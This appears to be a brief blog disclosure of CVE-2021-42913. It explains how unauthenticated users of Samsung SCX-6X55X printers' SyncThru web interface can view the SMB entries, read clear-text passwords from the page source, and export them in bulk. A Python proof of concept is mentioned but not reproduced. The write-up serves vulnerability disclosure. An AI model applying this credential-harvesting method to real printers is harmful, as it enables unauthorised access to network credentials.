Samsung Printer SCX-6X55X Improper Access Control (CVE-2021-42913)

Samsung Printer SCX-6x55X Series SyncThru Web Service is affected by an improper access control vulnerability. The vulnerability can permit an attacker to gain access to a list of SMB users and passwords.

The multifunctional printers, Samsung Printer SCX-6X55X in particular, allow you to perform scans and send the scanned files directly to the server via SMB, as long as, obviously, you have previously registered users. You only can register or modify users if you’re logged as administrator.

SMB server list with somes inputs.

Even if you are not authenticated, you can access the smb server list entry..

Setup of user Giddeon.

.. and still get the clear text password by inspecting the page’s source code.

User giddeon password.

There will be scenarios that it will be impossible to manually enumerate input by input for each user. So you can download (export) the configuration of the smb server entries with the credentials in plain text.

I made this simple code in python, using the requests library to perform the proof of concept. You can access it by clicking here.

Code to exploit.

The export output of the smb entries will look like this.

SMB server list.

Proof of concept video.

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42913

NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-42913